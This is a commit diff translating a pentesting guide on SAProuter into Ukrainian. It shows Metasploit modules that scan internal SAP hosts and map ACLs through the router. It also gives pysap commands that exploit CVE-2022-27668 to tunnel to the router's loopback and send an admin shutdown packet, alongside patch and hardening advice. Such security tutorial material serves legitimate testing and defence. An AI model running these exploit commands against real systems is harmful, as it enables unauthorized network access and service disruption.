Translated ['src/network-services-pentesting/3299-pentesting-saprouter.m

2025-10-10 18:36:50 +00:00 · 2025-08-14 06:18:51 +00:00 · 2025-08-14 06:18:51 +00:00 · 94eff9bdb6
commit 94eff9bdb6
parent 35cca3dc7c
1 changed files with 69 additions and 6 deletions
--- a/src/network-services-pentesting/3299-pentesting-saprouter.md
+++ b/src/network-services-pentesting/3299-pentesting-saprouter.md
@ -1,13 +1,15 @@
 # # 3299/tcp - Пентестинг SAProuter
 {{#include ../banners/hacktricks-training.md}}
 ```text
 PORT     STATE SERVICE    VERSION
 3299/tcp open  saprouter?
 ```
-Це резюме посту з [https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/](https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/)
+Це резюме поста з [https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/](https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/)
-## Розуміння проникнення в SAProuter за допомогою Metasploit
+## Розуміння проникнення в SAProuter з Metasploit
-SAProuter діє як зворотний проксі для систем SAP, головним чином для контролю доступу між інтернетом та внутрішніми мережами SAP. Його зазвичай відкривають для інтернету, дозволяючи TCP порт 3299 через організаційні брандмауери. Ця конфігурація робить SAProuter привабливою мішенню для тестування на проникнення, оскільки він може слугувати шлюзом до внутрішніх мереж з високою цінністю.
+SAProuter діє як зворотний проксі для систем SAP, головним чином для контролю доступу між інтернетом та внутрішніми мережами SAP. Його зазвичай відкривають для інтернету, дозволяючи TCP порт 3299 через організаційні брандмауери. Така конфігурація робить SAProuter привабливою мішенню для тестування на проникнення, оскільки він може слугувати шлюзом до внутрішніх мереж з високою цінністю.
 **Сканування та збір інформації**
@ -25,7 +27,7 @@ msf auxiliary(sap_router_info_request) > run
 ```
 **Перерахування внутрішніх сервісів**
-З отриманими даними про внутрішню мережу, модуль **sap_router_portscanner** використовується для дослідження внутрішніх хостів і сервісів через SAProuter, що дозволяє глибше зрозуміти внутрішні мережі та конфігурації сервісів.
+З отриманими даними про внутрішню мережу, модуль **sap_router_portscanner** використовується для сканування внутрішніх хостів та сервісів через SAProuter, що дозволяє глибше зрозуміти внутрішні мережі та конфігурації сервісів.
 ```text
 msf auxiliary(sap_router_portscanner) > set INSTANCES 00-50
 msf auxiliary(sap_router_portscanner) > set PORTS 32NN
@ -34,7 +36,7 @@ msf auxiliary(sap_router_portscanner) > set PORTS 32NN
 **Розширена енумерація та картографування ACL**
-Подальше сканування може виявити, як налаштовані списки контролю доступу (ACL) на SAProuter, детально описуючи, які з'єднання дозволені або заблоковані. Ця інформація є вирішальною для розуміння політик безпеки та потенційних вразливостей.
+Подальше сканування може виявити, як налаштовані списки контролю доступу (ACL) на SAProuter, детально описуючи, які з'єднання дозволені або заблоковані. Ця інформація є ключовою для розуміння політик безпеки та потенційних вразливостей.
 ```text
 msf auxiliary(sap_router_portscanner) > set MODE TCP
 msf auxiliary(sap_router_portscanner) > set PORTS 80,32NN
@ -53,13 +55,74 @@ msf auxiliary(sap_hostctrl_getcomputersystem) > run
 ```
 **Висновок**
-Цей підхід підкреслює важливість безпечних конфігурацій SAProuter і висвітлює потенціал доступу до внутрішніх мереж через цілеспрямоване пенетрування. Правильне забезпечення SAP маршрутизаторів і розуміння їхньої ролі в архітектурі мережевої безпеки є критично важливим для захисту від несанкціонованого доступу.
+Цей підхід підкреслює важливість безпечних конфігурацій SAProuter і висвітлює потенціал доступу до внутрішніх мереж через цілеспрямоване пенетрування. Правильне забезпечення безпеки SAP маршрутизаторів і розуміння їхньої ролі в архітектурі мережевої безпеки є критично важливими для захисту від несанкціонованого доступу.
 Для отримання більш детальної інформації про модулі Metasploit та їх використання, відвідайте [базу даних Rapid7](http://www.rapid7.com/db).
 ---
 ## Останні вразливості (2022-2025)
 ### CVE-2022-27668 – Неправильний контроль доступу ➜ Віддалене виконання адміністративних команд
 У червні 2022 року SAP випустила Security Note **3158375**, що стосується критичної вразливості (CVSS 9.8) в SAProuter (всі ядра ≥ 7.22). Неавтентифікований зловмисник може зловживати дозволеними записами `saprouttab`, щоб **надсилати адміністративні пакети** (наприклад, *shutdown*, *trace-level*, *connection-kill*) з віддаленого хоста, навіть коли маршрутизатор був запущений без опції `-X` remote-admin.
 Проблема виникає через можливість побудувати тунель до власного інтерфейсу циклічного з'єднання маршрутизатора, націлюючись на невизначену адресу **0.0.0.0**. Після встановлення тунелю зловмисник отримує привілеї локального хоста і може виконувати будь-яку адміністративну команду.
 Практична експлуатація може бути відтворена за допомогою фреймворку **pysap**:
 ```bash
 # 1. Build a loopback tunnel through the vulnerable SAProuter
 python router_portfw.py -d <ROUTER_IP> -p 3299 \
 -t 0.0.0.0    -r 3299 \
 -a 127.0.0.1  -l 3299 -v
 # 2. Send an admin packet (here: stop the remote router)
 python router_admin.py -s -d 127.0.0.1 -p 3299
 ```
 **Постраждалі версії**
 * Окремий SAProuter 7.22 / 7.53
 * Ядро 7.49, 7.77, 7.81, 7.85–7.88 (включно з KRNL64NUC/UC)
 **Виправлення / Пом'якшення**
 1. Застосуйте патч, наданий з SAP Note **3158375**.
 2. Видаліть цільові символи підстановки (`*`) з рядків `P` та `S` у `saprouttab`.
 3. Переконайтеся, що маршрутизатор запущений **без** параметра `-X` і **не** підключений безпосередньо до Інтернету.
 ---
 ## Оновлені інструменти та трюки
 * **pysap** – активно підтримується і надає `router_portfw.py`, `router_admin.py` та `router_trace.py` для створення користувацьких пакетів NI/Router, фуззингу ACL або автоматизації експлуатації CVE-2022-27668.
 * **Nmap** – розширте виявлення сервісів, додавши користувацький SAProuter зонд:
 ```text
 Probe TCP SAProuter q|\x00\x00\x00\x00|
 ports 3299
 match saprouter m|SAProuter ([\d.]+)| p/SAProuter/ v/$1/
 ```
 Поєднайте з NSE-скриптами або `--script=banner`, щоб швидко визначити версії, які витікають рядок банера (`SAProuter <ver> on '<host>'`).
 * **Metasploit** – допоміжні модулі, показані вище, все ще працюють через SOCKS або NI проксі, створений з pysap, що дозволяє повну інтеграцію фреймворку, навіть коли маршрутизатор блокує прямий доступ.
 ---
 ## Контрольний список зміцнення та виявлення
 * Фільтруйте порт **3299/TCP** на периметральному брандмауері – дозволяйте трафік лише з надійних мереж підтримки SAP.
 * Тримайте SAProuter **повністю оновленим**; перевірте за допомогою `saprouter -v` і порівняйте з останнім рівнем патчу ядра.
 * Використовуйте **строгі, специфічні для хоста** записи в `saprouttab`; уникайте символів підстановки `*` і забороняйте правила `P`/`S`, які націлені на довільні хости або порти.
 * Запустіть сервіс з **`-S <secudir>` + SNC**, щоб забезпечити шифрування та взаємну аутентифікацію.
 * Вимкніть віддалене адміністрування (`-X`) і, якщо можливо, прив'яжіть слухача до `127.0.0.1`, використовуючи зовнішній зворотний проксі для необхідного трафіку.
 * Моніторте журнал **dev_rout** на наявність підозрілих пакетів `ROUTER_ADM` або несподіваних запитів `NI_ROUTE` до `0.0.0.0`.
 ---
 ## **Посилання**
 - [https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/](https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/)
 - [https://sec-consult.com/vulnerability-lab/advisory/improper-access-control-in-sap-saprouter/](https://sec-consult.com/vulnerability-lab/advisory/improper-access-control-in-sap-saprouter/)
 ## Shodan